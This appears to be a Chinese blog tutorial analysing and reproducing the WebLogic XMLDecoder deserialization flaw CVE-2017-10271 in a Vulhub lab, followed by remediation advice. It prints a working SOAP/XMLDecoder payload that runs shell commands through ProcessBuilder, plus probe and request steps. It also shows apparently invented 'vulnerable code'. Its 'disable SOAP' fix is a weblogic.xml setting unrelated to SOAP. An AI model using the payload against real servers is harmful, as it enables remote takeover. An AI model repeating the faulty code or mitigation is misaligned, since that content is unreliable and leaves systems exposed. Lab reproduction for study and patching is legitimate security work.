当前位置: 首页 > article >正文

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)深度解析与实战复现

0x00 漏洞概述

CVE-2017-10271 是Oracle WebLogic Server WLS Security组件中的远程代码执行漏洞。攻击者通过构造恶意XML请求,利用XMLDecoder反序列化机制绕过安全验证,最终实现服务器权限接管

影响版本

  • WebLogic 10.3.6.0
  • WebLogic 12.1.3.0
  • WebLogic 12.2.1.0~12.2.1.2

漏洞危害

  • 远程代码执行(RCE):直接获取服务器Shell
  • 数据泄露:读取数据库配置、密钥等敏感信息
  • 横向渗透:作为跳板攻击内网其他系统

0x01 漏洞原理

技术背景

WebLogic的wls-wsat组件(Web Services Atomic Transaction)用于处理SOAP协议请求,其核心流程如下:

SOAP Request → XMLDecoder解析 → 实例化Java对象 → 执行操作

漏洞触发点在于XMLDecoder未对反序列化内容做安全过滤,导致攻击者可通过恶意XML注入任意Java代码。

关键代码分析

漏洞位于wls-wsat.war!/CoordinatorPortType.java

public void processXML(XMLStreamReader xmlReader) {
    XMLDecoder decoder = new XMLDecoder(xmlReader); // 未校验输入直接反序列化
    Object obj = decoder.readObject();              // 恶意对象被实例化
    invokeBusinessLogic(obj);                       // 触发恶意逻辑
}

攻击载荷构造

利用java.lang.ProcessBuilder执行系统命令的典型XML结构:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>touch /tmp/pwned</string></void>
          </array>
          <void method="start"/></void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

0x02 环境搭建

实验环境

组件版本
Docker20.10+
Vulhub靶场weblogic/CVE-2017-10271
攻击机Kali Linux 2023

一键启动漏洞环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d

访问 http://your-ip:7001 确认WebLogic控制台正常加载。


0x03 漏洞复现

步骤1:检测漏洞端点

发送探测请求到/wls-wsat/CoordinatorPortType端点:

curl -X GET http://target:7001/wls-wsat/CoordinatorPortType

若返回HTTP 200且包含WS-AtomicTransaction字样,则存在漏洞。

步骤2:构造RCE攻击

使用Burp Suite发送恶意SOAP请求:

  1. 请求路径POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Content-Typetext/xml
  3. Payload:替换XML中的<string>touch /tmp/pwned</string>为任意命令

步骤3:验证执行结果

进入Docker容器检查命令是否执行:

docker exec -it <container-id> /bin/bash
ls -l /tmp/pwned  # 查看文件是否创建成功

0x04 修复方案

临时缓解

  1. 删除wls-wsat组件:
    rm -rf /weblogic/path/servers/AdminServer/tmp/_WL_internal/wls-wsat
    
  2. 禁用SOAP协议:
    <!-- 修改weblogic.xml -->
    <container-descriptor>
        <index-directory-enabled>false</index-directory-enabled>
    </container-descriptor>
    

官方补丁

升级至WebLogic 10.3.6.0.21110712.2.1.4.211107 及以上版本。

长期防御

  • 输入过滤:对XML内容进行白名单校验
  • 权限隔离:WebLogic进程以低权限用户运行
  • 流量监控:使用WAF拦截异常SOAP请求

0x05 防御思考

此漏洞暴露了反序列化信任边界的致命缺陷。开发过程中应遵循:

  1. 最小化反序列化接口暴露
  2. 采用安全的序列化协议(如JSON、Protobuf)
  3. 强制签名验证关键数据

参考资源

  • Oracle官方公告
  • CVE-2017-10271漏洞分析报告
  • WebLogic加固指南

实验声明:本文仅用于网络安全研究,请在合法授权环境下进行测试!


http://www.kler.cn/a/585560.html

相关文章:

  • JVM 的不同组成部分分别有什么作用?
  • URL 中的参数通常用于跟踪和传递信息,特别是在在线广告和营销活动中。
  • 鸿蒙初学者学习手册(HarmonyOSNext_API14)_UIContext(@ohos.arkui.UIContext (UIContext))
  • tensorflow与torch并行读取数据机制
  • 浅谈StarRocks数据库简介及应用
  • 阿里巴巴发布 R1-Omni:首个基于 RLVR 的全模态大语言模型,用于情感识别
  • ZooKeeper的五大核心作用及其在分布式系统中的关键价值
  • Redis 常用数据类型
  • 在 Qt 中自定义控件样式:使用 QProxyStyle 代理和修改绘制元素
  • AnyAnomaly: 基于大型视觉语言模型的零样本可定制视频异常检测
  • 回文字串(信息学奥赛一本通-2044)
  • 网络华为HCIA+HCIP网络层协议
  • 【雅思播客08】I‘m sorry. I love you.
  • 最新AI智能体Prompt指令预设词分享+GPTs应用使用
  • Unity插件-适用于画面传输的FMETP STREAM使用方法(一)FMETP STREAM介绍
  • 大数据学习(67)- Flume、Sqoop、Kafka、DataX对比
  • 基于SSM的线上视频学习系统
  • Tomcat Session 反序列化漏洞(CVE-2025-24813)
  • 京鲁医疗健康专家委员会聊城专家团成立
  • 万字长文详解嵌入式电机软件开发